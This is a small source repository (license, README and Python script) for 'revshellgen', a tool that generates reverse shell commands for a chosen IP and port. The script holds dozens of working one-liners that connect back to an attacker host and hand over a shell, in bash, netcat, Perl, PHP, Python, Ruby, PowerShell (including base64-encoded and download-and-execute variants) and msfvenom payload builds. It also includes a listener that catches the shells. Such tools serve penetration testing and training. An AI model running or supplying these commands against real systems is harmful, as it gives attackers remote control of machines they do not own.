├── LICENSE ├── README.md └── revshellgen.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Cody Winkler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # revshellgen 2 | Simple script to generate commands to achieve reverse shells. Thanks to DevoOverkill9 for the great idea! 
3 | 4 | ![Screenshot](https://user-images.githubusercontent.com/45709553/54481816-b75ff180-4807-11e9-84db-17aadd39799c.PNG) 5 | 6 | ## Usage 7 | 8 | ``` 9 | revshellgen.py [-h] [-i IPADDR] [-p PORT] [-t SHELL_TYPE] [-l] [-a] 10 | 11 | python revshellgen.py --help 12 | 13 | optional arguments: 14 | -h, --help show this help message and exit 15 | -i IPADDR, --ipaddr IPADDR 16 | IP address to connect back to 17 | -p PORT, --port PORT Port to connect back to 18 | -t SHELL_TYPE, --type SHELL_TYPE 19 | Type of reverse shell to generate 20 | -l, --list List available shell types 21 | -a, --all Generate all the shells! 22 | ``` 23 | 24 | ### Shell Types: 25 | 26 | - ASP: `asp` 27 | - AWK: `awk` 28 | - Bash: `bash`, `bash-2`, `bash-3` 29 | - Java: `java` 30 | - Java Server Page: `jsp` 31 | - Linux Binary: `lin-bin` 32 | - Lua: `lua` 33 | - Netcat (regular, mknod, & mkfifo variants): `nc`, `nc-c`, `nc-mkfifo`, `nc-mknod`, `nc-pipe`, `ncat` 34 | - Nodejs: `nodejs` 35 | - OSX Mach-O Binary: `osx-bin` 36 | - Perl: `perl`, `perl-2`, `perl-windows` 37 | - PHP: `php`, `php-2`, `php-3`, `php-4`, `php-5` 38 | - Powershell TCPClient: `ps-tcp` 39 | - Powershell IEX: `ps-iex`, `ps-b64` 40 | - Python: `python`, `python-2` 41 | - Ruby: `ruby`, `ruby-2`, `ruby-windows` 42 | - Socat (preferred for interactive sessions): `socat` 43 | - Tclsh: `tclsh` 44 | - Telnet: `telnet`, `telnet-mkfifo` 45 | - War: `war` 46 | - Windows Binary: `win-bin` 47 | - Xterm: `xterm` 48 | 49 | ## Recommended Setup Steps 50 | 51 | For ease of use, it's recommended to add revshellgen to your `PATH` variable and give it executable permissions. 
52 | 53 | ``` 54 | chmod +x /dir/to/revshellgen.py 55 | export PATH=$PATH:/dir/to/revshellgen 56 | ``` 57 | 58 | Alternatively, you can integrate it with other Kali tools by performing the following: 59 | 60 | ``` 61 | chmod +x /dir/to/revshellgen.py 62 | ln -s /dir/to/revshellgen.py /usr/bin/revshellgen 63 | ``` 64 | 65 | Keep in mind that this isn't ideal for multi-user systems, and you should create root-owned symbolic links with discretion: whoever can write to the target script controls what runs every time the link is invoked. It is imperative that revshellgen.py itself is not writable by untrusted users when you set this up. 66 | 67 | **Another Example:** 68 | 69 | ![Screenshot](https://user-images.githubusercontent.com/45709553/54481815-b5962e00-4807-11e9-84a1-80c7901452c7.PNG) 70 | -------------------------------------------------------------------------------- /revshellgen.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import socket 5 | import sys 6 | import time 7 | from base64 import b64encode 8 | 9 | def parse_options(): 10 | 11 | parser = argparse.ArgumentParser(description='python revshellgen.py -i 127.0.0.1 -p 1234 -t bash') 12 | parser.add_argument("-i", "--ipaddr", type=str, help="IP address to connect back to") 13 | parser.add_argument("-p", "--port", type=int, help="Port to connect back to") 14 | parser.add_argument("-t", "--type", type=str, help="Type of reverse shell to generate", dest='shell_type') 15 | parser.add_argument("-li", "--listen", action="store_true", help='Open a socket and listen for a shell') 16 | parser.add_argument("-ls", "--list", action="store_true", help="List available shell types", dest='shell_list') 17 | parser.add_argument("-a", "--all", action="store_true", help="Generate all the shells!", dest='all_shells') 18 | args = parser.parse_args() 19 | # Print help if there is absolutely nothing passed from CLI 20 | if args.all_shells == False and args.ipaddr == None and args.port == None and args.shell_list == False and 
args.shell_type == None: 21 | print(parser.print_help()) 22 | return args 23 | 24 | def main(args): 25 | 26 | if args.ipaddr or args.port != None: 27 | ipaddr = args.ipaddr 28 | port = args.port 29 | else: 30 | ipaddr = '127.0.0.1' 31 | port = 1234 32 | 33 | shells = { 34 | 'asp':'msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%d -f asp > revshell.asp' % (ipaddr, port), 35 | 'awk':'awk \'BEGIN {s = "/inet/tcp/0/%s/%d"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}\' /dev/null' % (ipaddr, port), 36 | 'bash':'bash -i >& /dev/tcp/%s/%d 0>&1' % (ipaddr, port), 37 | 'bash-2':'0<&196;exec 196<>/dev/tcp/%s/%d; bash <&196 >&196 2>&196' % (ipaddr, port), 38 | 'bash-3':'exec 5<> /dev/tcp/%s/%d; cat <&5 | while read line; do $line 2>&5>&5; done' % (ipaddr, port), 39 | 'java':'r = Runtime.getRuntime();p = r.exec(["/bin/sh","-c","exec 5<>/dev/tcp/%s/%d;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]);p.waitFor();' % (ipaddr, port), 40 | 'jsp':'msfvenom -p java/jsp_shell_reverse_tcp LHOST=%s LPORT=%d -f raw > revshell.jsp' % (ipaddr, port), 41 | 'lin-bin':'msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=%s LPORT=%d -f elf > revshell' % (ipaddr, port), 42 | 'lua':'lua5.1 -e \'local host,port = \"%s\",%d local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host,port); while true do local cmd,status,partial = tcp:receive() local f = io.popen(cmd,'r') local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()\'' % (ipaddr, port), 43 | 'nc':'nc -e /bin/sh %s %d' % (ipaddr, port), 44 | 'nc-c':'nc -c /bin/sh %s %d' % (ipaddr, port), 45 | 'nc-mkfifo':'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f' % (ipaddr, port), 46 | 'nc-mknod':'rm /tmp/l;mknod /tmp/l p;/bin/sh 0/tmp/l' % (ipaddr, port), 47 | 'nc-pipe':'/bin/sh | nc %s %d' % (ipaddr, port), 
48 | 'ncat':'ncat %s %d -e /bin/sh' % (ipaddr, port), 49 | 'nodejs':'(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/sh",[]);var client=new net.Socket();client.connect(%d,"%s",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();' % (port, ipaddr), 50 | 'osx-bin':'msfvenom -p osx/x86/shell_reverse_tcp LHOST=%s LPORT=%d -f macho > revshell.macho' % (ipaddr, port), 51 | 'perl':'perl -e \'use Socket;$i="%s";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' % (ipaddr, port), 52 | 'perl-2':'perl -MIO -e \'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"%s:%d");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'' % (ipaddr, port), 53 | 'perl-windows':'perl -MIO -e \'$c=new IO::Socket::INET(PeerAddr,"%s:%d");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'' % (ipaddr, port), 54 | 'php':'php -r \'$sock=fsockopen("%s",%d);exec("/bin/sh -i <&3 >&3 2>&3");\'' % (ipaddr, port), 55 | 'php-2':'php -r \'$s=fsockopen("%s",%d);shell_exec("/bin/sh -i <&3 >&3 2>&3");\'' % (ipaddr, port), 56 | 'php-3':'php -r \'$s=fsockopen("%s",%d);`/bin/sh -i <&3 >&3 2>&3`;\'' % (ipaddr, port), 57 | 'php-4':'php -r \'$s=fsockopen("%s",%d);system("/bin/sh -i <&3 >&3 2>&3");\'' % (ipaddr, port), 58 | 'php-5':'php -r \'$s=fsockopen("%s",%d);popen("/bin/sh -i <&3 >&3 2>&3", "r");\'' % (ipaddr, port), 59 | 'ps-tcp':'powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"%s\",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = 
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' % (ipaddr, port), 60 | 'ps-iex':'powershell IEX (New-Object Net.WebClient).DownloadString("http://%s:%d/revshell.ps1") \n\nMake a revshell.ps1 file and put it on your server!' % (ipaddr, port), 61 | 'ps-b64':'powershell -e '+ b64encode(('$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' % (ipaddr, port)).encode('utf16')[2:]).decode(), 62 | 'python':'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);\'' % (ipaddr, port), 63 | 'python-2':'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")\'' % (ipaddr, port), 64 | 'ruby':'ruby -rsocket -e\'f=TCPSocket.open(\"%s\",%d).to_i;exec sprintf(\"/bin/sh -i <&3 >&3 2>&3\",f,f,f)\'' % (ipaddr, port), 65 | 'ruby-2':'ruby -rsocket -e \'exit if fork;c=TCPSocket.new("%s","%d");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end\'' % (ipaddr, port), 66 | 'ruby-windows':'ruby -rsocket -e \'c=TCPSocket.new("%s","%d");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end\'' % (ipaddr, port), 67 | 'socat':'socat exec:\'bash -li\',pty,stderr,setsid,sigint,sane tcp:%s:%d \n\n[+] Catch incoming shell with:\n\nsocat file:`tty`,raw,echo=0 
tcp-listen:%d' % (ipaddr, port, port), 68 | 'tclsh':'echo \'set s [socket %s %d];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;\' | tclsh' % (ipaddr, port), 69 | 'telnet':'rm -f /tmp/p; mknod /tmp/p p && telnet %s %d 0/tmp/p' % (ipaddr, port), 70 | 'telnet-mkfifo':'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet %s %d > /tmp/f' % (ipaddr, port), 71 | 'war':'msfvenom -p java/shell_reverse_tcp LHOST=%s LPORT=%d -f war -o revshell.war' % (ipaddr, port), 72 | 'win-bin':'msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%d -f exe > revshell.exe' % (ipaddr, port), 73 | 'xterm':'xterm -display %s:1 \n\n[+] Connect to your shell with:\n\nXnest :1 or xhost +targetip' % (ipaddr) 74 | } 75 | 76 | if args.shell_type: 77 | print("\n[+] Reverse shell command:\n") 78 | print(shells[args.shell_type]) 79 | 80 | if args.shell_list: 81 | print("\n[+] Available shell types:\n") 82 | print(shells.keys()) 83 | 84 | if args.all_shells: 85 | print("\n[+]Reverse shell commands:\n") 86 | for t,shell in shells.items(): 87 | print("{}\n".format(shell)) 88 | 89 | if args.listen: 90 | 91 | null = 'echo ""'.encode() 92 | print("\n[+] Listening.\n") 93 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 94 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 95 | s.bind(('0.0.0.0', args.port)) 96 | s.listen(5) 97 | conn, addr = s.accept() 98 | print("Connection from {}".format(addr)) 99 | while True: 100 | data = conn.recv(1024).decode() 101 | if not data: 102 | break 103 | sys.stdout.write(str(data)) 104 | command = sys.stdin.readline() 105 | if 'exit' in command: 106 | conn.close() 107 | sys.exit() 108 | if 'clear' in command: 109 | conn.send(command.encode()) 110 | conn.send(null) 111 | if 'export' in command: 112 | conn.send(command.encode()) 113 | conn.send(null) 114 | conn.send(command.encode()) 115 | time.sleep(0.1) 116 | 117 | if __name__ == "__main__": 118 | 
119 | args = parse_options() 120 | main(args) 121 | --------------------------------------------------------------------------------